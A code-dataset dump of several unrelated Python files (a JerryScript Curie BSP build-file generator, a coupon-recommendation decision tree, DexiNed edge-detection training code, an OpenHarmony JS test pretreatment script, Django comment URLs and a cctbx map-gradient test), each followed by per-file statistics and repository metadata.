""" Creates @project_path/quark/Kbuild.mk file. """
quark_kbuild_path = os.path.join(project_path, 'quark', 'Kbuild.mk')
# Extract a few JerryScript related data
jerry_data = build_jerry_data(jerry_path)
jerry_objects = build_obj_y(jerry_data['sources'])
jerry_defines = jerry_data['cflags']
jerry_build_dirs = build_mkdir(jerry_data['dirs'])
quark_include_paths = [
'include',
'jerryscript',
os.path.join('jerryscript', 'jerry-math', 'include'),
os.path.join('jerryscript', 'targets', 'baremetal-sdk', 'curie-bsp', 'include')
] + list(jerry_data['dirs'])
quark_includes = [
'-Wno-error',
] + ['-I%s' % os.path.join(project_path, 'quark', path) for path in quark_include_paths]
quark_cflags = build_cflags_y(jerry_defines + quark_includes)
quark_kbuild_content = '''
{cflags}
obj-y += main.o
{objects}
build_dirs:
{dirs}
$(OUT_SRC): build_dirs
'''.format(objects=jerry_objects, cflags=quark_cflags, dirs=jerry_build_dirs)
write_file(quark_kbuild_path, quark_kbuild_content)
def main(curie_path, project_name, jerry_path):
project_path = os.path.join(curie_path, 'wearable_device_sw', 'projects', project_name)
build_soft_links(project_path, jerry_path)
create_root_kbuild(project_path)
create_root_makefile(project_path)
create_arc_kbuild(project_path)
create_quark_kbuild(project_path, jerry_path)
if __name__ == '__main__':
import sys
if len(sys.argv) != 2:
print('Usage:')
print('{script_name} [full or relative path of Curie_BSP]'.format(script_name=sys.argv[0]))
sys.exit(1)
project_name = 'curie_bsp_jerry'
file_dir = os.path.dirname(os.path.abspath(__file__))
jerry_path = os.path.join(file_dir, "..", "..", "..")
curie_path = os.path.join(os.getcwd(), sys.argv[1])
main(curie_path, project_name, jerry_path)
| 32.107143
| 113
| 0.66024
| 1,100
| 8,091
| 4.607273
| 0.224545
| 0.036701
| 0.04341
| 0.027624
| 0.20955
| 0.143646
| 0.113852
| 0.060576
| 0.053275
| 0.053275
| 0
| 0.006365
| 0.20393
| 8,091
| 251
| 114
| 32.23506
| 0.780469
| 0.193548
| 0
| 0
| 0
| 0
| 0.274537
| 0.066635
| 0
| 0
| 0
| 0
| 0
| 1
| 0.077419
| false
| 0
| 0.019355
| 0
| 0.129032
| 0.025806
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe613281281e5fa651291114e4bc822aff3309a5
| 2,001
|
py
|
Python
|
duke-cs671-fall21-coupon-recommendation/outputs/rules/RF/17_features/numtrees_30/rule_20.py
|
apcarrik/kaggle
|
6e2d4db58017323e7ba5510bcc2598e01a4ee7bf
|
[
"MIT"
] | null | null | null |
duke-cs671-fall21-coupon-recommendation/outputs/rules/RF/17_features/numtrees_30/rule_20.py
|
apcarrik/kaggle
|
6e2d4db58017323e7ba5510bcc2598e01a4ee7bf
|
[
"MIT"
] | null | null | null |
duke-cs671-fall21-coupon-recommendation/outputs/rules/RF/17_features/numtrees_30/rule_20.py
|
apcarrik/kaggle
|
6e2d4db58017323e7ba5510bcc2598e01a4ee7bf
|
[
"MIT"
] | null | null | null |
def findDecision(obj): #obj[0]: Passanger, obj[1]: Weather, obj[2]: Time, obj[3]: Coupon, obj[4]: Coupon_validity, obj[5]: Gender, obj[6]: Age, obj[7]: Maritalstatus, obj[8]: Children, obj[9]: Education, obj[10]: Occupation, obj[11]: Income, obj[12]: Bar, obj[13]: Coffeehouse, obj[14]: Restaurant20to50, obj[15]: Direction_same, obj[16]: Distance
# {"feature": "Maritalstatus", "instances": 34, "metric_value": 0.99, "depth": 1}
if obj[7]>0:
# {"feature": "Age", "instances": 25, "metric_value": 0.9896, "depth": 2}
if obj[6]<=5:
# {"feature": "Time", "instances": 21, "metric_value": 0.9984, "depth": 3}
if obj[2]<=1:
# {"feature": "Occupation", "instances": 13, "metric_value": 0.8905, "depth": 4}
if obj[10]<=13:
# {"feature": "Coupon", "instances": 11, "metric_value": 0.684, "depth": 5}
if obj[3]>0:
# {"feature": "Distance", "instances": 10, "metric_value": 0.469, "depth": 6}
if obj[16]<=2:
return 'False'
elif obj[16]>2:
# {"feature": "Coupon_validity", "instances": 2, "metric_value": 1.0, "depth": 7}
if obj[4]<=0:
return 'True'
elif obj[4]>0:
return 'False'
else: return 'False'
else: return 'True'
elif obj[3]<=0:
return 'True'
else: return 'True'
elif obj[10]>13:
return 'True'
else: return 'True'
elif obj[2]>1:
# {"feature": "Occupation", "instances": 8, "metric_value": 0.8113, "depth": 4}
if obj[10]<=7:
return 'True'
elif obj[10]>7:
# {"feature": "Weather", "instances": 3, "metric_value": 0.9183, "depth": 5}
if obj[1]<=0:
return 'False'
elif obj[1]>0:
return 'True'
else: return 'True'
else: return 'False'
else: return 'True'
elif obj[6]>5:
return 'True'
else: return 'True'
elif obj[7]<=0:
# {"feature": "Age", "instances": 9, "metric_value": 0.5033, "depth": 2}
if obj[6]>0:
return 'False'
elif obj[6]<=0:
return 'True'
else: return 'True'
else: return 'False'
| 37.754717
| 347
| 0.571714
| 289
| 2,001
| 3.913495
| 0.211073
| 0.123784
| 0.095491
| 0.105217
| 0.392573
| 0.296198
| 0.20336
| 0.121132
| 0.070734
| 0
| 0
| 0.092534
| 0.216892
| 2,001
| 52
| 348
| 38.480769
| 0.629228
| 0.54023
| 0
| 0.5
| 0
| 0
| 0.10011
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.02381
| false
| 0
| 0
| 0
| 0.285714
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe61ee9fb03a144ec04e2fb8220326b27f35be96
| 18,786
|
py
|
Python
|
main.py
|
AdrienCourtois/DexiNed
|
1198c043f4ed46efd7ad7bc77edf39ba66f0f3b1
|
[
"MIT"
] | null | null | null |
main.py
|
AdrienCourtois/DexiNed
|
1198c043f4ed46efd7ad7bc77edf39ba66f0f3b1
|
[
"MIT"
] | null | null | null |
main.py
|
AdrienCourtois/DexiNed
|
1198c043f4ed46efd7ad7bc77edf39ba66f0f3b1
|
[
"MIT"
] | null | null | null |
from __future__ import print_function
import argparse
import os
import time, platform
import cv2
import torch
import torch.optim as optim
from torch.utils.data import DataLoader
from datasets import DATASET_NAMES, BipedDataset, TestDataset, dataset_info
from losses import *
from model import DexiNed
# from model0C import DexiNed
from utils import (image_normalization, save_image_batch_to_disk,
visualize_result)
IS_LINUX = True if platform.system()=="Linux" else False
def train_one_epoch(epoch, dataloader, model, criterion, optimizer, device,
log_interval_vis, tb_writer, args=None):
imgs_res_folder = os.path.join(args.output_dir, 'current_res')
os.makedirs(imgs_res_folder,exist_ok=True)
# Put model in training mode
model.train()
# l_weight = [0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 1.1] # for bdcn ori loss
# before [0.6,0.6,1.1,1.1,0.4,0.4,1.3] [0.4,0.4,1.1,1.1,0.6,0.6,1.3],[0.4,0.4,1.1,1.1,0.8,0.8,1.3]
l_weight = [0.7,0.7,1.1,1.1,0.3,0.3,1.3] # for bdcn loss theory 3 before the last 1.3 0.6-0..5
# l_weight = [[0.05, 2.], [0.05, 2.], [0.05, 2.],
# [0.1, 1.], [0.1, 1.], [0.1, 1.],
# [0.01, 4.]] # for cats loss
for batch_id, sample_batched in enumerate(dataloader):
images = sample_batched['images'].to(device) # BxCxHxW
labels = sample_batched['labels'].to(device) # BxHxW
preds_list = model(images)
# loss = sum([criterion(preds, labels, l_w, device) for preds, l_w in zip(preds_list, l_weight)]) # cats_loss
loss = sum([criterion(preds, labels,l_w)/args.batch_size for preds, l_w in zip(preds_list,l_weight)]) # bdcn_loss
# loss = sum([criterion(preds, labels) for preds in preds_list]) #HED loss, rcf_loss
optimizer.zero_grad()
loss.backward()
optimizer.step()
if tb_writer is not None:
tb_writer.add_scalar('loss',
loss.detach(),
(len(dataloader) * epoch + batch_id))
if batch_id % 5 == 0:
print(time.ctime(), 'Epoch: {0} Sample {1}/{2} Loss: {3}'
.format(epoch, batch_id, len(dataloader), loss.item()))
if batch_id % log_interval_vis == 0:
res_data = []
img = images.cpu().numpy()
res_data.append(img[2])
ed_gt = labels.cpu().numpy()
res_data.append(ed_gt[2])
# tmp_pred = tmp_preds[2,...]
for i in range(len(preds_list)):
tmp = preds_list[i]
tmp = tmp[2]
# print(tmp.shape)
tmp = torch.sigmoid(tmp).unsqueeze(dim=0)
tmp = tmp.cpu().detach().numpy()
res_data.append(tmp)
vis_imgs = visualize_result(res_data, arg=args)
del tmp, res_data
vis_imgs = cv2.resize(vis_imgs,
(int(vis_imgs.shape[1]*0.8), int(vis_imgs.shape[0]*0.8)))
img_test = 'Epoch: {0} Sample {1}/{2} Loss: {3}' \
.format(epoch, batch_id, len(dataloader), loss.item())
BLACK = (0, 0, 255)
font = cv2.FONT_HERSHEY_SIMPLEX
font_size = 1.1
font_color = BLACK
font_thickness = 2
x, y = 30, 30
vis_imgs = cv2.putText(vis_imgs,
img_test,
(x, y),
font, font_size, font_color, font_thickness, cv2.LINE_AA)
cv2.imwrite(os.path.join(imgs_res_folder, 'results.png'), vis_imgs)
def validate_one_epoch(epoch, dataloader, model, device, output_dir, arg=None):
# XXX This is not really validation, but testing
# Put model in eval mode
model.eval()
with torch.no_grad():
for _, sample_batched in enumerate(dataloader):
images = sample_batched['images'].to(device)
# labels = sample_batched['labels'].to(device)
file_names = sample_batched['file_names']
image_shape = sample_batched['image_shape']
preds = model(images)
# print('pred shape', preds[0].shape)
save_image_batch_to_disk(preds[-1],
output_dir,
file_names,img_shape=image_shape,
arg=arg)
def test(checkpoint_path, dataloader, model, device, output_dir, args):
if not os.path.isfile(checkpoint_path):
raise FileNotFoundError(
f"Checkpoint filte note found: {checkpoint_path}")
print(f"Restoring weights from: {checkpoint_path}")
model.load_state_dict(torch.load(checkpoint_path,
map_location=device))
# Put model in evaluation mode
model.eval()
with torch.no_grad():
total_duration = []
for batch_id, sample_batched in enumerate(dataloader):
images = sample_batched['images'].to(device)
if not args.test_data == "CLASSIC":
labels = sample_batched['labels'].to(device)
file_names = sample_batched['file_names']
image_shape = sample_batched['image_shape']
print(f"input tensor shape: {images.shape}")
# images = images[:, [2, 1, 0], :, :]
start_time = time.time()
preds = model(images)
tmp_duration = time.time() - start_time
total_duration.append(tmp_duration)
save_image_batch_to_disk(preds,
output_dir,
file_names,
image_shape,
arg=args)
torch.cuda.empty_cache()
total_duration = np.array(total_duration)
print("******** Testing finished in", args.test_data, "dataset. *****")
print("Average time per image: %f.4" % total_duration.mean(), "seconds")
print("Time spend in the Dataset: %f.4" % total_duration.sum(), "seconds")
def testPich(checkpoint_path, dataloader, model, device, output_dir, args):
# a test model plus the interganged channels
if not os.path.isfile(checkpoint_path):
raise FileNotFoundError(
f"Checkpoint filte note found: {checkpoint_path}")
print(f"Restoring weights from: {checkpoint_path}")
model.load_state_dict(torch.load(checkpoint_path,
map_location=device))
# Put model in evaluation mode
model.eval()
with torch.no_grad():
total_duration = []
for batch_id, sample_batched in enumerate(dataloader):
images = sample_batched['images'].to(device)
if not args.test_data == "CLASSIC":
labels = sample_batched['labels'].to(device)
file_names = sample_batched['file_names']
image_shape = sample_batched['image_shape']
print(f"input tensor shape: {images.shape}")
start_time = time.time()
# images2 = images[:, [1, 0, 2], :, :] #GBR
images2 = images[:, [2, 1, 0], :, :] # RGB
preds = model(images)
preds2 = model(images2)
tmp_duration = time.time() - start_time
total_duration.append(tmp_duration)
save_image_batch_to_disk([preds,preds2],
output_dir,
file_names,
image_shape,
arg=args, is_inchannel=True)
torch.cuda.empty_cache()
total_duration = np.array(total_duration)
print("******** Testing finished in", args.test_data, "dataset. *****")
print("Average time per image: %f.4" % total_duration.mean(), "seconds")
print("Time spend in the Dataset: %f.4" % total_duration.sum(), "seconds")
def parse_args():
"""Parse command line arguments."""
parser = argparse.ArgumentParser(description='DexiNed trainer.')
parser.add_argument('--choose_test_data',
type=int,
default=3,
help='Already set the dataset for testing choice: 0 - 8')
# ----------- test -------0--
TEST_DATA = DATASET_NAMES[parser.parse_args().choose_test_data] # max 8
test_inf = dataset_info(TEST_DATA, is_linux=IS_LINUX)
test_dir = test_inf['data_dir']
is_testing = True # current test _bdcnlossNew256-sd7-1.10.4p5
# Training settings
TRAIN_DATA = DATASET_NAMES[0] # BIPED=0
train_inf = dataset_info(TRAIN_DATA, is_linux=IS_LINUX)
train_dir = train_inf['data_dir']
# Data parameters
parser.add_argument('--input_dir',
type=str,
default=train_dir,
help='the path to the directory with the input data.')
parser.add_argument('--input_val_dir',
type=str,
default=test_inf['data_dir'],
help='the path to the directory with the input data for validation.')
parser.add_argument('--output_dir',
type=str,
default='checkpoints',
help='the path to output the results.')
parser.add_argument('--train_data',
type=str,
choices=DATASET_NAMES,
default=TRAIN_DATA,
help='Name of the dataset.')
parser.add_argument('--test_data',
type=str,
choices=DATASET_NAMES,
default=TEST_DATA,
help='Name of the dataset.')
parser.add_argument('--test_list',
type=str,
default=test_inf['test_list'],
help='Dataset sample indices list.')
parser.add_argument('--train_list',
type=str,
default=train_inf['train_list'],
help='Dataset sample indices list.')
parser.add_argument('--is_testing',type=bool,
default=is_testing,
help='Script in testing mode.')
parser.add_argument('--double_img',
type=bool,
default=True,
help='True: use same 2 imgs changing channels') # Just for test
parser.add_argument('--resume',
type=bool,
default=False,
help='use previous trained data') # Just for test
parser.add_argument('--checkpoint_data',
type=str,
default='14/14_model.pth',
help='Checkpoint path from which to restore model weights from.')
parser.add_argument('--test_img_width',
type=int,
default=test_inf['img_width'],
help='Image width for testing.')
parser.add_argument('--test_img_height',
type=int,
default=test_inf['img_height'],
help='Image height for testing.')
parser.add_argument('--res_dir',
type=str,
default='result',
help='Result directory')
parser.add_argument('--log_interval_vis',
type=int,
default=50,
help='The number of batches to wait before printing test predictions.')
parser.add_argument('--epochs',
type=int,
default=22,
metavar='N',
help='Number of training epochs (default: 25).')
parser.add_argument('--lr',
default=1e-4,
type=float,
help='Initial learning rate.')
parser.add_argument('--wd',
type=float,
default=1e-4,
metavar='WD',
help='weight decay (default: 1e-4)')
# parser.add_argument('--lr_stepsize',
# default=1e4,
# type=int,
# help='Learning rate step size.')
parser.add_argument('--batch_size',
type=int,
default=8,
metavar='B',
help='the mini-batch size (default: 8)')
parser.add_argument('--workers',
default=8,
type=int,
help='The number of workers for the dataloaders.')
parser.add_argument('--tensorboard',type=bool,
default=True,
help='Use Tensorboard for logging.'),
parser.add_argument('--img_width',
type=int,
default=480,
help='Image width for training.') # BIPED 400 BSDS 352 MDBD 480
parser.add_argument('--img_height',
type=int,
default=480,
help='Image height for training.') # BIPED 400 BSDS 352
parser.add_argument('--channel_swap',
default=[2, 1, 0],
type=int)
parser.add_argument('--crop_img',
default=True,
type=bool,
help='If true crop training images, else resize images to match image width and height.')
parser.add_argument('--mean_pixel_values',
default=[103.939,116.779,123.68, 137.86],
type=float) # [103.939,116.779,123.68] [104.00699, 116.66877, 122.67892]
args = parser.parse_args()
return args
def main(args):
"""Main function."""
print(f"Number of GPU's available: {torch.cuda.device_count()}")
print(f"Pytorch version: {torch.__version__}")
# Tensorboard summary writer
tb_writer = None
training_dir = os.path.join(args.output_dir,args.train_data)
os.makedirs(training_dir,exist_ok=True)
checkpoint_path = os.path.join(args.output_dir, args.train_data, args.checkpoint_data)
if args.tensorboard and not args.is_testing:
# from tensorboardX import SummaryWriter # previous torch version
from torch.utils.tensorboard import SummaryWriter # for torch 1.4 or greather
tb_writer = SummaryWriter(log_dir=training_dir)
# Get computing device
device = torch.device('cpu' if torch.cuda.device_count() == 0
else 'cuda')
# Instantiate model and move it to the computing device
model = DexiNed().to(device)
# model = nn.DataParallel(model)
ini_epoch =0
if not args.is_testing:
if args.resume:
ini_epoch=17
model.load_state_dict(torch.load(checkpoint_path,
map_location=device))
dataset_train = BipedDataset(args.input_dir,
img_width=args.img_width,
img_height=args.img_height,
mean_bgr=args.mean_pixel_values[0:3] if len(
args.mean_pixel_values) == 4 else args.mean_pixel_values,
train_mode='train',
arg=args
)
dataloader_train = DataLoader(dataset_train,
batch_size=args.batch_size,
shuffle=True,
num_workers=args.workers)
dataset_val = TestDataset(args.input_val_dir,
test_data=args.test_data,
img_width=args.test_img_width,
img_height=args.test_img_height,
mean_bgr=args.mean_pixel_values[0:3] if len(
args.mean_pixel_values) == 4 else args.mean_pixel_values,
test_list=args.test_list, arg=args
)
dataloader_val = DataLoader(dataset_val,
batch_size=1,
shuffle=False,
num_workers=args.workers)
# Testing
if args.is_testing:
output_dir = os.path.join(args.res_dir, args.train_data+"2"+ args.test_data)
print(f"output_dir: {output_dir}")
if args.double_img:
# predict twice an image changing channels, then mix those results
testPich(checkpoint_path, dataloader_val, model, device, output_dir, args)
else:
test(checkpoint_path, dataloader_val, model, device, output_dir, args)
return
criterion = bdcn_loss2
optimizer = optim.Adam(model.parameters(),
lr=args.lr,
weight_decay=args.wd)
# lr_schd = lr_scheduler.StepLR(optimizer, step_size=args.lr_stepsize,
# gamma=args.lr_gamma)
# Main training loop
seed=1021
for epoch in range(ini_epoch,args.epochs):
if epoch%7==0:
seed = seed+1000
np.random.seed(seed)
torch.manual_seed(seed)
torch.cuda.manual_seed(seed)
print("------ Random seed applied-------------")
# Create output directories
output_dir_epoch = os.path.join(args.output_dir,args.train_data, str(epoch))
img_test_dir = os.path.join(output_dir_epoch, args.test_data + '_res')
os.makedirs(output_dir_epoch,exist_ok=True)
os.makedirs(img_test_dir,exist_ok=True)
train_one_epoch(epoch,
dataloader_train,
model,
criterion,
optimizer,
device,
args.log_interval_vis,
tb_writer,
args=args)
validate_one_epoch(epoch,
dataloader_val,
model,
device,
img_test_dir,
arg=args)
# Save model after end of every epoch
torch.save(model.module.state_dict() if hasattr(model, "module") else model.state_dict(),
os.path.join(output_dir_epoch, '{0}_model.pth'.format(epoch)))
if __name__ == '__main__':
args = parse_args()
main(args)
| 42.406321
| 121
| 0.524806
| 2,107
| 18,786
| 4.475083
| 0.170859
| 0.026726
| 0.050483
| 0.01209
| 0.42645
| 0.370877
| 0.322304
| 0.303001
| 0.285396
| 0.252731
| 0
| 0.026567
| 0.370861
| 18,786
| 442
| 122
| 42.502262
| 0.771216
| 0.103535
| 0
| 0.340058
| 0
| 0
| 0.131715
| 0.00161
| 0
| 0
| 0
| 0
| 0
| 1
| 0.017291
| false
| 0
| 0.037464
| 0
| 0.060519
| 0.048991
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe62800d500daa91f541e4f0b0257370caac7c78
| 5,905
|
py
|
Python
|
src/core/build/pretreat_targets.py
|
chaoyangcui/test_developertest
|
151309bf6cdc7e31493a3461d3c7f17a1b371c09
|
[
"Apache-2.0"
] | null | null | null |
src/core/build/pretreat_targets.py
|
chaoyangcui/test_developertest
|
151309bf6cdc7e31493a3461d3c7f17a1b371c09
|
[
"Apache-2.0"
] | null | null | null |
src/core/build/pretreat_targets.py
|
chaoyangcui/test_developertest
|
151309bf6cdc7e31493a3461d3c7f17a1b371c09
|
[
"Apache-2.0"
] | 1
|
2021-09-13T12:03:37.000Z
|
2021-09-13T12:03:37.000Z
|
#!/usr/bin/env python3
# coding=utf-8
#
# Copyright (c) 2021 Huawei Device Co., Ltd.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import sys
import json
import shutil
from core.constants import JsTestConst
from xdevice import platform_logger
LOG = platform_logger("PretreatTargets")
##############################################################################
##############################################################################
class PretreatTargets(object):
def __init__(self, target_list):
self.path_list = []
self.name_list = []
self.target_list = target_list
def pretreat_targets_from_list(self):
path_list, name_list = self._parse_target_info()
self._pretreat_by_target_name(path_list, name_list)
def disassemble_targets_from_list(self):
self._disassemble_by_target_name(self.path_list, self.name_list)
def _parse_target_info(self):
path_list = []
name_list = []
for line in self.target_list:
path = line.split(':')[0][2:]
name = line.split(':')[1].split('(')[0]
path_list.append(path)
name_list.append(name)
return path_list, name_list
def _pretreat_by_target_name(self, path_list, name_list):
for name, path in zip(name_list, path_list):
if name.endswith("JsTest"):
if self._pretreat_js_target(path, name):
self.path_list.append(path)
self.name_list.append(name)
LOG.info("js test %s pretreat success" % name)
def _pretreat_js_target(self, path, name):
template_path = os.path.join(sys.framework_root_dir, "libs",
"js_template", "src")
target_path = os.path.join(sys.source_code_root_path, path)
config_path = os.path.join(target_path, "config.json")
gn_path = os.path.join(target_path, "BUILD.gn")
gn_bak_path = os.path.join(target_path, "BuildBak")
test_path = os.path.join(target_path, "src", "main", "js",
"default", "test")
if not os.path.exists(config_path):
LOG.error("js test needs config.json file")
return False
if not os.path.exists(gn_path):
LOG.error("js test needs BUILD.gn file")
return False
LOG.info("target_path: %s" % target_path)
#modify BUILD.gn file to compile hap
output_path = self._parse_output_path_in_gn(gn_path)
if output_path == "":
LOG.error(" BUILD.gn needs 'module_output_path'")
return
os.rename(gn_path, gn_bak_path)
template_args = {'output_path': output_path, 'suite_name': name}
with open(gn_path, 'w') as filehandle:
filehandle.write(JsTestConst.BUILD_GN_FILE_TEMPLATE %
template_args)
#copy js hap template to target path
shutil.copytree(template_path, os.path.join(target_path, "src"))
shutil.copy(config_path, os.path.join(target_path, "src", "main"))
file_name = os.listdir(target_path)
for file in file_name:
if file.endswith(".js"):
LOG.info("file: %s" % file)
shutil.copy(os.path.join(target_path, file), test_path)
with open(os.path.join(test_path, "List.test.js"), 'a') \
as list_data:
list_data.write("require('./%s')" % file)
#modify i18n json file
i18n_path = os.path.join(target_path, "src", "main", "js",
"default", "i18n", "en-US.json")
json_data = ""
with open(i18n_path, 'r') as i18n_file:
lines = i18n_file.readlines()
for line in lines:
if "TargetName" in line:
line = line.replace("TargetName", name)
json_data += line
with open(i18n_path, 'w') as i18n_file:
i18n_file.write(json_data)
return True
def _parse_output_path_in_gn(self, gn_path):
output_path = ""
with open(gn_path, 'r') as gn_file:
for line in gn_file.readlines():
if line.startswith("module_output_path"):
output_path = line.split()[2].strip('"')
break
return output_path
def _disassemble_by_target_name(self, path_list, name_list):
for name, path in zip(name_list, path_list):
LOG.info("name: %s path: %s" % (name, path))
if name.endswith("JsTest"):
self._disassemble_js_target(path, name)
LOG.info("js test %s disassemble success" % name)
def _disassemble_js_target(self, path, name):
target_path = os.path.join(sys.source_code_root_path, path)
src_path = os.path.join(target_path, "src")
gn_path = os.path.join(target_path, "BUILD.gn")
gn_bak_path = os.path.join(target_path, "BuildBak")
if os.path.exists(src_path):
shutil.rmtree(src_path)
if os.path.exists(gn_path) and os.path.exists(gn_bak_path):
os.remove(gn_path)
os.rename(gn_bak_path, gn_path)
##############################################################################
##############################################################################
| 39.366667
| 78
| 0.573412
| 746
| 5,905
| 4.30563
| 0.219839
| 0.03736
| 0.0467
| 0.056663
| 0.307908
| 0.232254
| 0.188356
| 0.146015
| 0.136364
| 0.136364
| 0
| 0.007667
| 0.271126
| 5,905
| 149
| 79
| 39.630872
| 0.738615
| 0.11685
| 0
| 0.115385
| 0
| 0
| 0.089885
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.086538
| false
| 0
| 0.057692
| 0
| 0.211538
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe63a253f1cf19a404c6e2b601535edfb1888800
| 657
|
py
|
Python
|
tests/testapp/urls.py
|
lukaszbanasiak/django-contrib-comments
|
8a99ed810e9e94cb9dff1c362b2c4ebe2e37dead
|
[
"BSD-3-Clause"
] | 1
|
2018-05-29T08:43:57.000Z
|
2018-05-29T08:43:57.000Z
|
tests/testapp/urls.py
|
lukaszbanasiak/django-contrib-comments
|
8a99ed810e9e94cb9dff1c362b2c4ebe2e37dead
|
[
"BSD-3-Clause"
] | null | null | null |
tests/testapp/urls.py
|
lukaszbanasiak/django-contrib-comments
|
8a99ed810e9e94cb9dff1c362b2c4ebe2e37dead
|
[
"BSD-3-Clause"
] | 1
|
2018-08-25T01:38:12.000Z
|
2018-08-25T01:38:12.000Z
|
from __future__ import absolute_import
from django.conf.urls import patterns, url
from django_comments.feeds import LatestCommentFeed
from custom_comments import views
feeds = {
'comments': LatestCommentFeed,
}
urlpatterns = patterns('',
url(r'^post/$', views.custom_submit_comment),
url(r'^flag/(\d+)/$', views.custom_flag_comment),
url(r'^delete/(\d+)/$', views.custom_delete_comment),
url(r'^approve/(\d+)/$', views.custom_approve_comment),
url(r'^cr/(\d+)/(.+)/$', 'django.contrib.contenttypes.views.shortcut', name='comments-url-redirect'),
)
urlpatterns += patterns('',
(r'^rss/comments/$', LatestCommentFeed()),
)
| 26.28
| 105
| 0.692542
| 78
| 657
| 5.641026
| 0.384615
| 0.045455
| 0.1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.121766
| 657
| 24
| 106
| 27.375
| 0.762565
| 0
| 0
| 0
| 0
| 0
| 0.232877
| 0.09589
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.235294
| 0
| 0.235294
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe646aafd2f602c63f8aacb84f51c78795b63990
| 7,537
|
py
|
Python
|
cctbx/maptbx/tst_target_and_gradients.py
|
rimmartin/cctbx_project
|
644090f9432d9afc22cfb542fc3ab78ca8e15e5d
|
[
"BSD-3-Clause-LBNL"
] | null | null | null |
cctbx/maptbx/tst_target_and_gradients.py
|
rimmartin/cctbx_project
|
644090f9432d9afc22cfb542fc3ab78ca8e15e5d
|
[
"BSD-3-Clause-LBNL"
] | null | null | null |
cctbx/maptbx/tst_target_and_gradients.py
|
rimmartin/cctbx_project
|
644090f9432d9afc22cfb542fc3ab78ca8e15e5d
|
[
"BSD-3-Clause-LBNL"
] | null | null | null |
from __future__ import division
from cctbx.array_family import flex
from cctbx import xray
from cctbx import crystal
from cctbx import maptbx
from cctbx.maptbx import minimization
from libtbx.test_utils import approx_equal
import random
from cctbx.development import random_structure
from cctbx import sgtbx
if (1):
random.seed(0)
flex.set_random_seed(0)
def get_xrs():
crystal_symmetry = crystal.symmetry(
unit_cell=(10,10,10,90,90,90),
space_group_symbol="P 1")
return xray.structure(
crystal_symmetry=crystal_symmetry,
scatterers=flex.xray_scatterer([
xray.scatterer(label="C", site=(0,0,0))]))
def get_map(xrs, d_min=1.):
f_calc = xrs.structure_factors(d_min=d_min).f_calc()
fft_map = f_calc.fft_map()
fft_map.apply_sigma_scaling()
return fft_map.real_map_unpadded(), f_calc
def exercise_00():
"""
Exercise maptbx.target_and_gradients_diffmap .
"""
xrs = get_xrs()
map_data, f_calc = get_map(xrs=xrs)
tg = maptbx.target_and_gradients_diffmap(
unit_cell = xrs.unit_cell(),
map_target = map_data,
map_current = map_data,
step = 0.3,
sites_frac = xrs.sites_frac())
assert approx_equal(xrs.sites_cart(), [[0,0,0]])
assert approx_equal(tg.target(), 0)
assert approx_equal(list(tg.gradients()), [[0,0,0]])
xrs = xrs.translate(x=0.3, y=-0.5, z=0.7)
assert approx_equal(xrs.sites_cart(), [[0.3,-0.5,0.7]])
map_current, f_calc = get_map(xrs=xrs)
tg = maptbx.target_and_gradients_diffmap(
unit_cell = xrs.unit_cell(),
map_target = map_data,
map_current = map_current,
step = 0.3,
sites_frac = xrs.sites_frac())
assert tg.target() > 0
for g in tg.gradients():
for g_ in g:
assert abs(g_)>0.
def exercise_01(d_min=1.0):
"""
Exercise maptbx.target_and_gradients_diffmap in action: minimization.
"""
xrs = get_xrs()
map_target, f_calc = get_map(xrs=xrs)
assert approx_equal(xrs.sites_cart(), [[0,0,0]])
for sx in [-1,0,1]:
for sy in [-1,0,1]:
for sz in [-1,0,1]:
xrs_cp = xrs.deep_copy_scatterers()
xrs_cp = xrs_cp.translate(x=0.3*sx, y=0.5*sy, z=0.7*sz)
assert approx_equal(xrs_cp.sites_cart(), [[0.3*sx,0.5*sy,0.7*sz]],1.e-6)
crystal_gridding = maptbx.crystal_gridding(
unit_cell = xrs_cp.unit_cell(),
space_group_info = xrs_cp.space_group_info(),
pre_determined_n_real = map_target.accessor().all())
o = minimization.run(
xray_structure = xrs_cp,
miller_array = f_calc,
crystal_gridding = crystal_gridding,
map_target = map_target,
step = d_min/4,
target_type = "diffmap")
assert approx_equal(xrs.sites_cart(), [[0,0,0]])
def exercise_02():
"""
Exercise maptbx.target_and_gradients_diffmap in action: minimization
(bigger model).
"""
